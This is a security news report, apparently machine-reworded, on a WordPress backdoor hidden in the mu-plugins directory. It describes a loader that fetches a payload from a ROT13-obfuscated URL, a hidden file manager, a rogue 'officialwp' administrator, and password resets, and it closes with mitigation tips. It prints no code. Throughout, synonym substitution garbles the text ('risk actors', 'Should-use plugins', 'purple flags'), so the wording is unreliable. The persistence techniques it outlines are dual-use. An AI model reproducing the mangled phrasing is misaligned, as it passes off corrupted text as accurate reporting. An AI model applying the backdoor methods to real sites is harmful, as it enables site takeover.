Cybersecurity researchers have uncovered a brand new stealthy backdoor hid throughout the “mu-plugins” listing in WordPress websites to grant risk actors persistent entry and permit them to carry out arbitrary actions.
Should-use plugins (aka mu-plugins) are particular plugins which might be routinely activated on all WordPress websites within the set up. They’re positioned within the “wp-content/mu-plugins” listing by default.
What makes them an enticing possibility for attackers is that mu-plugins don’t present within the default listing of plugins on the Plugins web page of wp-admin and can’t be disabled besides by eradicating the plugin file from the must-use listing.
Because of this, a chunk of malware that leverages this system permits it to perform quietly, with out elevating any purple flags.
Within the an infection noticed by internet safety firm Sucuri, the PHP script within the mu-plugins listing (“wp-index.php”) serves as a loader to fetch a next-stage payload and put it aside within the WordPress database throughout the wp_options desk beneath _hdra_core.
The distant payload is retrieved from a URL that is obfuscated utilizing ROT13, a easy substitution cipher that replaces a letter with the thirteenth letter after it (i.e., A turns into N, B turns into O, C turns into P, and so forth).
“The fetched content material is then briefly written to disk and executed,” safety researcher Puja Srivastava mentioned. “This backdoor provides the attacker persistent entry to the location and the power to run any PHP code remotely.
Particularly, it injects a hidden file supervisor into the theme listing as “pricing-table-3.php,” allowing risk actors to browse, add, or delete information. It additionally creates an administrator consumer named “officialwp” after which downloads a malicious plugin (“wp-bot-protect.php”) and prompts it.
Apart from reinstating the an infection within the occasion of deletion, the malware incorporates the power to vary the passwords of widespread administrator usernames, comparable to “admin,” “root,” and “wpsupport,” to a default password set by the attacker. This additionally extends to its personal “officialwp” consumer.
In doing so, the risk actors can take pleasure in persistent entry to the websites and carry out malicious actions, whereas successfully locking out different directors. This may vary from knowledge theft to injecting code that may serve malware to website guests or redirect them to different scammy websites.
“The attackers achieve full administrator entry and a persistent backdoor, permitting them to do something on the location, from putting in extra malware to defacing it,” Srivastava mentioned. “The distant command execution and content material injection options imply the attackers can change the malware’s conduct.”
To mitigate in opposition to these threats, it is important that website house owners replace WordPress, themes, and plugins periodically, safe accounts utilizing two-factor authentication, and often audit all sections of the location, together with theme and plugin information.
